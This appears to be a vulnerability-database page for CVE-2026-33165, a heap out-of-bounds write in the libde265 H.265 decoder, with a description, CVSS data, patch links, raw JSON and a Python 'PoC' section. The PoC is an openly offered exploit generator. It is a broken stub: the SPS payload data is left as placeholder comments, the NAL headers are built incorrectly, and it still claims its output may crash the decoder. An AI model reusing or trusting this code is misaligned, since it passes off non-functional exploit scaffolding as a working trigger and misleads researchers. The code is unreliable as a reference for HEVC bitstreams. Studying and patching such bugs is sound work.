Security Vulnerability Report
CVE-2026-33165 CVSS 5.5 MEDIUM

Published: 2026-03-20 21:17:16
Last Modified: 2026-03-23 20:09:05

Description

libde265 is an open source implementation of the h.265 video codec. Prior to version 1.0.17, a crafted HEVC bitstream causes an out-of-bounds heap write confirmed by AddressSanitizer. The trigger is a stale ctb_info.log2unitSize after an SPS change where PicWidthInCtbsY and PicHeightInCtbsY stay constant but Log2CtbSizeY changes, causing set_SliceHeaderIndex to index past the allocated image metadata array and write 2 bytes past the end of a heap allocation. This issue has been patched in version 1.0.17.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:struktur:libde265:*:*:*:*:*:*:*:* - VULNERABLE
libde265 < 1.0.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct


def generate_poc(filename):
    """
    PoC for CVE-2026-33165.
    Generates a crafted HEVC bitstream that triggers the out-of-bounds write.
    The trigger is a stale ctb_info.log2unitSize after an SPS change.
    """
    with open(filename, 'wb') as f:
        # HEVC NAL Unit Start Code
        start_code = b'\x00\x00\x00\x01'

        # NAL Header for SPS (Type 33)
        # We need to construct two SPS units with specific properties.
        # SPS 1: Log2CtbSizeY = 6, Width/Height in CTBs = 1 (e.g., 64x64 image)
        # SPS 2: Log2CtbSizeY = 5, Width/Height in CTBs = 1 (e.g., 32x32 image but reported as 1x1 CTB)

        # Note: This is a simplified structural representation.
        # A functional PoC requires precise bit-level construction of the RBSP.

        # Write First SPS (Trigger setup)
        f.write(start_code)
        f.write(struct.pack('>B', 0x40 | 33))  # NAL Header
        # ... SPS RBSP data would go here ...

        # Write Second SPS (The Change)
        f.write(start_code)
        f.write(struct.pack('>B', 0x40 | 33))  # NAL Header
        # ... Malformed SPS RBSP data changing Log2CtbSizeY while keeping PicWidthInCtbsY constant ...

        # Write Slice Header to trigger set_SliceHeaderIndex
        f.write(start_code)
        f.write(struct.pack('>B', 0x40 | 1))  # Slice Header NAL

    print(f"PoC file generated: {filename}")
    print("Decoding this file with libde265 < 1.0.17 may cause a crash.")


if __name__ == "__main__":
    generate_poc("cve_2026_33165.hevc")
```

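References

https://github.com/strukturag/libde265/commit/c7891e412106130b83f8e8ea8b7f907e9449b658 (Patch)
https://github.com/strukturag/libde265/releases/tag/v1.0.17 (Release Notes)
https://github.com/strukturag/libde265/security/advisories/GHSA-653q-9f73-8hvg (Exploit, Vendor Advisory, Patch)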

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33165", "sourceIdentifier": "[email protected]", "published": "2026-03-20T21:17:16.453", "lastModified": "2026-03-23T20:09:04.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libde265 is an open source implementation of the h.265 video codec. Prior to version 1.0.17, a crafted HEVC bitstream causes an out-of-bounds heap write confirmed by AddressSanitizer. The trigger is a stale ctb_info.log2unitSize after an SPS change where PicWidthInCtbsY and PicHeightInCtbsY stay constant but Log2CtbSizeY changes, causing set_SliceHeaderIndex to index past the allocated image metadata array and write 2 bytes past the end of a heap allocation. This issue has been patched in version 1.0.17."}, {"lang": "es", "value": "libde265 es una implementación de código abierto del códec de video h.265. Antes de la versión 1.0.17, un flujo de bits HEVC manipulado causa una escritura fuera de límites en el heap confirmada por AddressSanitizer. El desencadenante es un ctb_info.log2unitSize obsoleto después de un cambio de SPS donde PicWidthInCtbsY y PicHeightInCtbsY permanecen constantes pero Log2CtbSizeY cambia, lo que hace que set_SliceHeaderIndex indexe más allá del array de metadatos de imagen asignado y escriba 2 bytes más allá del final de una asignación de heap. 
Este problema ha sido parcheado en la versión 1.0.17."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:struktur:libde265:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.17", "matchCriteriaId": "40DB036E-3A5D-4245-B887-4123769ECB8D"}]}]}], "references": [{"url": "https://github.com/strukturag/libde265/commit/c7891e412106130b83f8e8ea8b7f907e9449b658", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/strukturag/libde265/releases/tag/v1.0.17", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/strukturag/libde265/security/advisories/GHSA-653q-9f73-8hvg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Patch"]}]}}